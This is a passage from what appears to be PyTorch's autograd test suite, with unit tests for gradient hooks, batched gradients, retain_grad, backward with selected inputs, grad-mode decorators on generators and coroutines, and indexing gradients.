@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
self.fail("This node should not be executed!")
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
(gY,) = torch.autograd.grad(x, (y, ), allow_unused=True)
self.assertIsNone(gY)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
z = torch.randn(1, requires_grad=True)
(gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True)
self.assertIsNone(gY)
self.assertIsNotNone(gZ)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
torch.autograd.backward(x, inputs=(y, )) # allow_unused is implicitly True!
self.assertIsNone(y.grad)
def test_grad_batched_grad(self):
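# With is_grads_batched=True the leading dimension of each grad_output is
# treated as a batch dimension and the backward pass is vectorized over it,
# producing one gradient per batch element.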
x = torch.randn(2, 2, requires_grad=True)
out = x.clone() # Size([2, 2])
batched_grad = torch.arange(3).expand(2, 2, 3).transpose(0, 2) # Size([3, 2, 2])
grad, = torch.autograd.grad(out, (x,), (batched_grad,), is_grads_batched=True)
self.assertEqual(grad, torch.arange(3).expand(2, 2, 3).transpose(0, 2).to(dtype=grad.dtype))
# Detect shape mismatch
grad_out = torch.ones(2, 2)
with self.assertRaisesRegex(RuntimeError, "If `is_grads_batched=True`, we interpret the first"):
torch.autograd.grad(outputs=out, grad_outputs=(grad_out,), inputs=(x,), is_grads_batched=True)
# Scalar outputs
out = x.sum() # Size([])
batched_grad = torch.arange(3) # Size([3])
grad, = torch.autograd.grad(out, (x,), (batched_grad,), is_grads_batched=True)
self.assertEqual(grad, torch.arange(3).expand(2, 2, 3).transpose(0, 2).to(dtype=grad.dtype))
# We consider scalar and sized-1 to be a mismatch. This is consistent with current non-batched behavior.
grad_out = torch.ones(2).unsqueeze(1)
with self.assertRaisesRegex(RuntimeError, "If `is_grads_batched=True`, we interpret the first"):
torch.autograd.grad(outputs=out, grad_outputs=(grad_out,), inputs=(x,), is_grads_batched=True)
def test_hooks(self):
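# counter tracks hook invocations on z: one hook adds 1 per backward pass,
# adding a second hook makes each pass add 1 + 2 = 3, and removing it drops
# the increment back to 1.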
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
y.requires_grad_(True)
counter = [0]
def bw_hook(inc, grad):
self.assertIsInstance(grad, torch.Tensor)
counter[0] += inc
z = x ** 2 + x * 2 + x * y + y
x.register_hook(lambda *args: bw_hook(0, *args))
test = z.register_hook(lambda *args: bw_hook(1, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 1)
test2 = z.register_hook(lambda *args: bw_hook(2, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 4)
test2.remove()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 5)
def bw_hook_modify(grad):
return grad.mul(2)
test.remove()
z.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(y.grad, (x + 1) * 2)
y.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5))
self.assertEqual(y.grad, (x + 1) * 4)
def test_hooks_cpp(self):
# Tests hooks for autograd function implemented in C++
bn = torch.nn.BatchNorm1d(5, affine=False)
bn.double()
bn.eval()
counter = [0]
def bw_hook(grad):
counter[0] += 1
return grad * 2
x = torch.ones(5, 5, dtype=torch.double, requires_grad=True)
z = bn(x)
z.register_hook(bw_hook)
z.sum().backward()
self.assertEqual(counter[0], 1, msg='bw_hook not called')
self.assertEqual(x.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0)
def test_hook_none(self):
# WARNING: this is a test for autograd internals.
# You should never have to use such things in your code.
class NoneGradientFunction(Function):
@staticmethod
def forward(ctx, x, y):
assert ctx.needs_input_grad[0]
assert not ctx.needs_input_grad[1]
return x, y
@staticmethod
def backward(ctx, grad_x, grad_y):
return grad_x, None
was_called = [False]
def hook(grad):
self.assertIsNotNone(grad)
was_called[0] = True
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5)
rx, ry = NoneGradientFunction.apply(x, y)
rx.register_hook(hook)
ry.register_hook(hook)
sum(rx, ry).sum().backward()
self.assertTrue(was_called[0])
def test_retain_grad(self):
input = torch.rand(1, 3, requires_grad=True)
h1 = input * 3
out = (h1 * h1).sum()
# It should be possible to call retain_grad() multiple times
h1.retain_grad()
h1.retain_grad()
# Gradient should be accumulated
out.backward(retain_graph=True)
self.assertEqual(h1 * 2, h1.grad)
out.backward(retain_graph=True)
self.assertEqual(h1 * 4, h1.grad)
with torch.no_grad():
input.grad.zero_()
# It should be a no-op for leaves
input.retain_grad()
input.retain_grad()
out.backward()
self.assertEqual(input * 18, input.grad)
def test_retain_grad_cycle(self):
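# retain_grad() must not create a reference cycle that keeps y alive: once
# run_test returns, the weak reference should already be expired even though z
# still holds the graph and backward still runs.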
x = torch.ones(5, 5, requires_grad=True)
def run_test():
y = x * 2
y.retain_grad()
return y / 2, torch._C._WeakTensorRef(y)
z, ref = run_test()
self.assertTrue(ref.expired())
z.sum().backward()
def test_backward(self):
v = torch.randn(5, 5, requires_grad=True)
x = torch.randn(5, 5, requires_grad=True)
y = (torch.rand(5, 5) + 0.1).requires_grad_(True)
z = torch.randn(5, 5, requires_grad=True)
grad_output = torch.randn(5, 5)
v.backward(grad_output)
self.assertEqual(v.grad, grad_output)
a = x + (y * z) + 4 * z ** 2 * x / y
a.backward(grad_output)
x_grad = 4 * z.pow(2) / y + 1
y_grad = z - 4 * x * z.pow(2) / y.pow(2)
z_grad = 8 * x * z / y + y
self.assertEqual(x.grad, x_grad * grad_output)
self.assertEqual(y.grad, y_grad * grad_output)
self.assertEqual(z.grad, z_grad * grad_output)
def test_sparse_mm_backward(self):
size = (3, 3)
sparse = torch.sparse_coo_tensor(size, requires_grad=True)
dense = torch.randn(size, requires_grad=True)
with self.assertRaisesRegex(
RuntimeError,
"The backward pass for this operation requires the 'mat1' tensor to be strided,"):
z = dense.addmm(sparse, dense)
mm_test_cases = [
# a requires grad, a is sparse, b requires grad, b is sparse, error message
(False, True, True, False, None),
(False, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(False, True, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, False, True, True, "The backward pass for this operation requires the 'mat2'"),
(True, True, False, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, False, "The backward pass for this operation requires the 'self'"),
(True, True, True, True, "The backward pass for this operation requires the 'mat2'"),
]
for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases:
# We should only be testing cases with sparse inputs, and at least one
# input needs to require grad so we can call a backward pass
assert a_is_sparse or b_is_sparse
assert a_req_grad or b_req_grad
a = torch.randn(size, requires_grad=a_req_grad)
if a_is_sparse:
a = a.to_sparse()
b = torch.randn(size, requires_grad=b_req_grad)
if b_is_sparse:
b = b.to_sparse()
# If no error expected, check that sparse and dense cases match
if err_msg is None:
r = a.mm(b)
r.sum().backward()
a_grad = None if a.grad is None else a.grad.clone().detach()
b_grad = None if b.grad is None else b.grad.clone().detach()
# Redo with only dense tensors
a = (a.to_dense() if a.is_sparse else a).clone().detach()
a.requires_grad = a_req_grad
b = (b.to_dense() if b.is_sparse else b).clone().detach()
b.requires_grad = b_req_grad
r = a.mm(b)
r.sum().backward()
self.assertEqual(a_grad, a.grad)
self.assertEqual(b_grad, b.grad)
else:
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mm(b)
def test_multi_backward(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q = torch.randn(5, 5, requires_grad=True)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
q2 = q * 2
z = x + y + q2
c = a * b + q2
grad_z = torch.randn(5, 5)
grad_c = torch.randn(5, 5)
torch.autograd.backward([z, c], [grad_z, grad_c])
self.assertEqual(x.grad, grad_z)
self.assertEqual(y.grad, grad_z)
self.assertEqual(a.grad, grad_c * b)
self.assertEqual(b.grad, grad_c * a)
self.assertEqual(q.grad, (grad_c + grad_z) * 2)
def test_multi_backward_no_grad(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=False)
z = x + y
q = y * 2
# NB: we currently raise an exception if any arguments to backward()
# have requires_grad=False and don't have a grad_fn. We may want to
# relax that check to a warning.
def call_backwards():
torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)])
self.assertRaises(RuntimeError, call_backwards)
def test_backward_with_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
def fn():
return x ** 2 + y * x + y ** 2
gradient = torch.ones(2, 2)
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
@torch.no_grad()
def reset_grad():
x.grad.zero_()
y.grad.zero_()
torch.autograd.backward(fn(), gradient, inputs=[x, y])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, y_grad_expected)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[x])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[y])
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=y)
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
self.assertRaisesRegex(RuntimeError, 'cannot be empty',
lambda: torch.autograd.backward(fn(), gradient, inputs=[]))
def test_backward_with_nonleaf_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
x_nonleaf = x * 1
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
z = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y, x_nonleaf])
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
x_non_leaf_expected = 2 * x_nonleaf + y
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(x_nonleaf.grad, x_non_leaf_expected)
# backward() doesn't have an allow_unused flag, so when a variable is not part
# of the graph the behavior is as if allow_unused were True:
# z.grad will simply be None.
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z])
self.assertIsNone(z.grad)
def test_dependent_backward(self):
x = torch.randn(10, requires_grad=True)
y = x ** 2
z = y ** 3
go_y = torch.randn(10)
go_z = torch.randn(10)
torch.autograd.backward([y, z], [go_y, go_z])
xd = x
self.assertEqual(x.grad, 2 * xd * go_y + 6 * xd.pow(5) * go_z)
def test_save_output_nr(self):
x = torch.randn(10, requires_grad=True)
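# output_nr records which output of the producing node a tensor came from;
# b is the second output (index 1) of MultiOutputFn and should keep
# output_nr == 1 even after being saved and re-read in TestFn's backward.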
class MultiOutputFn(Function):
@staticmethod
def forward(ctx, x):
return x[:5], x[5:]
@staticmethod
def backward(ctx, *grad):
return torch.cat(grad)
a, b = MultiOutputFn.apply(x)
self.assertEqual(b.output_nr, 1)
class TestFn(Function):
@staticmethod
def forward(ctx, b):
ctx.save_for_backward(b)
return b * 2
@staticmethod
def backward(ctx, grad_b):
b, = ctx.saved_tensors
self.assertEqual(b.output_nr, 1)
TestFn.apply(b).sum().backward()
def test_free_deep_graph(self):
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build a "chain" computation graph
for _ in range(depth):
y = y + y * 0.000001
# graph deletion occurs when the above locals go out of scope.
# In this case `del y` will trigger it but it's easier to leave
# it to Python to delete the locals.
# Should not stack overflow
scope()
def test_free_deep_graph_complicated(self):
def scope():
depth = 100000
randchoice = torch.randint(2, [depth, 2])
x = torch.randn(1, requires_grad=True)
y = x.clone()
# Hold the two previous values
prev_values = [None, None]
# Build a "chain with skip connections" graph
for _ in range(depth):
prev_tensors = [tensor for tensor in prev_values[:-1]
if tensor is not None]
prev_values.append(y)
prev_values.pop(0)
# Definitely pick one tensor to add
y += y * 0.000001
# Possibly add other tensors
nprev = len(prev_tensors)
if nprev == 2:
y += randchoice[depth].mul(torch.cat(prev_tensors)).sum()
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_free_deep_graph_pyfunction(self):
class MyOp(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
return grad_output, grad_output
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build deeply nested computation graph
for _ in range(depth):
y = MyOp.apply(y, y)
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_no_unnecessary_save(self):
# If we kept x in the derivative Function of x * 2 we would
# get an error in the backward that would complain that we've
# modified x, which was needed for gradient computation.
# Since we should elide unnecessary saves, this test should pass.
mu = torch.ones(1, requires_grad=True)
x = torch.empty(1)
loss = 0
for i in range(3):
x.detach_()
x.copy_(mu + i)
ft = torch.tensor([float(i)])
multiplied = x * ft
s = multiplied.sum()
loss += s
loss.backward()
def test_no_grad(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
with torch.no_grad():
w = x + y
@torch.no_grad()
def adder(x, y):
return x + y
z = adder(x, y)
self.assertFalse(w.requires_grad)
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
self.assertIsNone(w.grad_fn)
self.assertFalse(z.requires_grad)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
self.assertIsNone(z.grad_fn)
# test nested decorator and with-statement on no_grad
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
w = adder(x, y)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions(self):
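# The no_grad / enable_grad decorators on a generator should apply their grad
# mode only while the generator body is actually running; whenever control
# returns to the caller, the caller's grad mode must be restored.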
@torch.no_grad()
def gen_no_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), False)
yield i
with torch.enable_grad():
for _ in gen_no_grad():
self.assertEqual(torch.is_grad_enabled(), True)
@torch.enable_grad()
def gen_enable_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), True)
yield i
with torch.no_grad():
for _ in gen_enable_grad():
self.assertEqual(torch.is_grad_enabled(), False)
def test_set_grad_generator_functions_recursive(self):
# enable_grad_decorator_recursive and no_grad_decorator_recursive call each other
# recursively, to ensure that the decorators preserve the caller's setting
@torch.enable_grad()
def enable_grad_decorator_recursive(depth):
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_decorator_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
@torch.no_grad()
def no_grad_decorator_recursive(depth):
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_decorator_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
# enable_grad_context_manager_recursive and no_grad_context_manager_recursive call
# each other recursively, to ensure that the decorators preserve the caller's setting
def enable_grad_context_manager_recursive(depth):
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_context_manager_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
def no_grad_context_manager_recursive(depth):
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_context_manager_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertTrue(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertTrue(torch.is_grad_enabled())
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertFalse(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_coroutines(self):
@torch.no_grad()
def coro_no_grad(n=10):
self.assertFalse(torch.is_grad_enabled())
for i in range(n):
self.assertFalse(torch.is_grad_enabled())
r = yield i
self.assertFalse(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertFalse(torch.is_grad_enabled())
@torch.enable_grad()
def coro_enable_grad(n=10):
self.assertTrue(torch.is_grad_enabled())
for i in range(n):
self.assertTrue(torch.is_grad_enabled())
r = yield i
self.assertTrue(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertTrue(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
coro, r = coro_no_grad(), None
try:
while True:
self.assertTrue(torch.is_grad_enabled())
r = coro.send(r)
self.assertTrue(torch.is_grad_enabled())
except StopIteration:
pass
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
coro, r = coro_enable_grad(), None
try:
while True:
self.assertFalse(torch.is_grad_enabled())
r = coro.send(r)
self.assertFalse(torch.is_grad_enabled())
except StopIteration:
pass
def test_set_grad_coroutines_benign_exceptions(self):
class RecoverableException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertFalse(torch.is_grad_enabled())
has_raised = True
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertTrue(torch.is_grad_enabled())
has_raised = True
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
def test_set_grad_coroutines_critical_exceptions(self):
class UnrecoverableException(Exception):
pass
class SecondaryException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertFalse(torch.is_grad_enabled())
raise SecondaryException
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertTrue(torch.is_grad_enabled())
raise SecondaryException
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
def test_set_grad_coroutines_exit(self):
@torch.no_grad()
def coro_no_grad(state):
for i in range(10):
try:
self.assertFalse(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertFalse(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
@torch.enable_grad()
def coro_enable_grad(state):
for i in range(10):
try:
self.assertTrue(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertTrue(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
state = set()
with torch.enable_grad():
coro = coro_no_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
state = set()
with torch.no_grad():
coro = coro_enable_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
def test_no_grad_python_function(self):
"""Python Functions should respect grad mode."""
x = torch.ones(5, 5, requires_grad=True)
class MyOp(Function):
@staticmethod
def forward(self, x):
return x + 1
@staticmethod
def backward(self, dy):
return dy
with torch.no_grad():
y = MyOp.apply(x)
self.assertFalse(y.requires_grad)
def test_indexing(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
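# For each indexing expression below, the gradient of indexed_var.sum() w.r.t.
# y should be 1 at every selected position and 0 elsewhere (duplicate indices
# are exercised separately in test_indexing_duplicates).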
def compare(x, y, idx, indexed_tensor, indexed_var):
indexed_var_t = indexed_var.data
if not isinstance(indexed_tensor, torch.Tensor):
indexed_var_t = indexed_var_t[0]
self.assertEqual(indexed_tensor, indexed_var_t)
indexed_var.sum().backward()
expected_grad = torch.empty(x.size()).fill_(0)
expected_grad[idx] = 1
self.assertEqual(y.grad, expected_grad)
def check_index(x, y, idx):
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[idx]
indexed_var = y[idx]
compare(x, y, idx, indexed_tensor, indexed_var)
check_index(x, y, 1)
check_index(x, y, (1, 1))
check_index(x, y, slice(1, None))
check_index(x, y, slice(None, 2))
check_index(x, y, (slice(None, 2), 2))
check_index(x, y, (slice(1, 2), 2))
check_index(x, y, (1, slice(2, None)))
check_index(x, y, (slice(None, None), slice(2, None)))
check_index(x, y, torch.LongTensor([0, 2]))
check_index(x, y, torch.rand(4, 4).bernoulli().bool())
check_index(x, y, (Ellipsis, slice(2, None)))
check_index(x, y, ([0], [0]))
check_index(x, y, ([1, 2, 3], [0]))
check_index(x, y, ([1, 2], [2, 1]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([slice(None), [2, 3]]))
check_index(x, y, ([[2, 3], slice(None)]))
# advanced indexing, with fewer dims, or ellipsis
check_index(x, y, ([0]))
check_index(x, y, ([0], ))
x = torch.arange(1., 49).view(4, 3, 4)
y = Variable(x, requires_grad=True)
check_index(x, y, (slice(None), [0], [0]))
check_index(x, y, ([0], [0], slice(None)))
check_index(x, y, (slice(None), [0, 1, 2], [0]))
check_index(x, y, ([0, 1, 2], [0], slice(None)))
check_index(x, y, (slice(None), [1, 2], [2, 1]))
check_index(x, y, ([1, 2], [2, 1], slice(None)))
check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None)))
check_index(x, y, (slice(None), slice(None), [2, 1]))
check_index(x, y, (slice(None), [2, 1], slice(None)))
check_index(x, y, ([2, 1], slice(None), slice(None)))
# advanced indexing, with fewer dims, or ellipsis
check_index(x, y, ([0], ))
check_index(x, y, ([0], slice(None)))
check_index(x, y, ([0], Ellipsis))
check_index(x, y, ([1, 2], [0, 1]))
check_index(x, y, ([1, 2], [0, 1], Ellipsis))
check_index(x, y, (Ellipsis, [1, 2], [0, 1]))
# advanced indexing, with a tensor wrapped in a variable
z = torch.LongTensor([0, 1])
zv = Variable(z, requires_grad=False)
seq = [z, Ellipsis]
seqv = [zv, Ellipsis]
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[seq]
indexed_var = y[seqv]
compare(x, y, seq, indexed_tensor, indexed_var)
def test_indexing_duplicates(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = torch.LongTensor([1, 1, 3, 2, 1, 2])
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx:
expected_grad[i] += 1
self.assertEqual(y.grad, expected_grad)
# with advanced indexing
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 3, 2, 1, 2], [0]]
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx[0]:
for j in idx[1]:
expected_grad[i][j] += 1
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]]
y[idx].sum().backward()
expected_grad = torch.tensor([[0., 2., 0., 0.],
[1., 0., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 0., 0.]])
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 65).view(4, 4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 1], slice(None), slice(None)]
y[idx].sum().backward()
expected_grad = torch.empty(4, 4, 4).zero_()
expected_grad[1].fill_(3)
self.assertEqual(y.grad, expected_grad)
def test_index_backward_does_not_save_tensor(self):
# Example from https://github.com/pytorch/pytorch/issues/24853.
# if `index(tensor, indices)` saves `tensor` for backward, then it will
# trigger a version check on `tensor` during the backward pass, which
# will cause the following code to error because `tensor` gets modified
# by the indexing line.
a = torch.tensor([1., 0, 0])
b = torch.zeros(3, requires_grad=True)
tensor = b + 0
tensor[a != 0] = tensor[a != 0]
tensor.backward(torch.zeros_like(tensor))
def test_volatile_deprecated(self):
v = torch.autograd.torch.randn(3, 3)
with warnings.catch_warnings(record=True) as w:
self.assertFalse(v.volatile)
self.assertIn('volatile', str(w[0].message))
def test_saved_variables_deprecated(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_variables
return (grad_output, grad_output)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("always")
x = torch.randn((3, 3), requires_grad=True)
y = torch.randn((3, 3), requires_grad=True)
MyFunction.apply(x, y).sum().backward()
has_deprecated = map(lambda warn:
'deprecated' in str(warn) and
'saved_variables' in str(warn),
warns)
has_deprecated = reduce(lambda x, y: x or y, has_deprecated)
self.assertTrue(has_deprecated)
def test_requires_grad(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
z = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertFalse(a.requires_grad)
b = a + z
self.assertTrue(b.requires_grad)
def error():
raise RuntimeError
# Make sure backward isn't called on these
a._backward_hooks = OrderedDict()
x._backward_hooks = OrderedDict()
y._backward_hooks = OrderedDict()
a._backward_hooks['test'] = error
x._backward_hooks['test'] = error
y._backward_hooks['test'] = error
b.backward(torch.ones(5, 5))
def test_requires_grad_(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
self.assertIs(x, x.requires_grad_())
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_())
self.assertTrue(y.requires_grad)
self.assertIs(x, x.requires_grad_(True))
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_(True))
self.assertTrue(y.requires_grad)
z = x * y
self.assertRaises(RuntimeError, lambda: z.requires_grad_(False))
self.assertIs(z, z.requires_grad_())
self.assertTrue(z.requires_grad)
self.assertIs(z, z.requires_grad_(True))
self.assertTrue(z.requires_grad)
self.assertIs(x, x.requires_grad_(False))
self.assertFalse(x.requires_grad)
self.assertIs(y, y.requires_grad_(False))
self.assertFalse(y.requires_grad)
def test_requires_grad_inplace(self):
a = torch.randn(5, 5)
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
# non-leaf
a = torch.randn(5, 5) + 0
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
def test_no_requires_grad_inplace(self):
# basic case, should be able to modify inplace while requires_grad is False
a = torch.randn(2, 3)
a.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# same but with a view
a = torch.randn(2, 3)
b = a[:]
b.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# should fail if requires_grad = True when we modify inplace
a = torch.randn(2, 3)
b = a[:]
a.requires_grad = True
with self.assertRaises(RuntimeError):
a.add_(5)
with self.assertRaises(RuntimeError):
b.add_(5)
def test_attribute_deletion(self):
x = torch.randn((5, 5), requires_grad=True)
del x.grad
self.assertIsNone(x.grad)
with self.assertRaises(RuntimeError):
del x.data
with self.assertRaises(TypeError):
x.data = None
with self.assertRaises(RuntimeError):
del x.requires_grad
with self.assertRaises(RuntimeError):
del x._grad_fn
with self.assertRaises(RuntimeError):
del x._backward_hooks
def test_duplicate_backward_root(self):
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
x = a * b
grad_output = torch.randn_like(x)
torch.autograd.backward([x, x], [grad_output, grad_output])
self.assertEqual(a.grad, b * grad_output * 2)
self.assertEqual(b.grad, a * grad_output * 2)
def test_backward_no_grad(self):
a = torch.randn(5, 5, requires_grad=True)
b = a + 2
with self.assertRaises(RuntimeError):
torch.autograd.backward([b], [None])
def test_backward_twice_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
lambda: c.backward(torch.tensor([1, 1, 1], dtype=torch.double)))
def test_backward_twice_retained_graph_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b + 1
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_retained_graph_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_create_graph_warns(self):
try:
prev = torch.is_warn_always_enabled()
torch.set_warn_always(True)
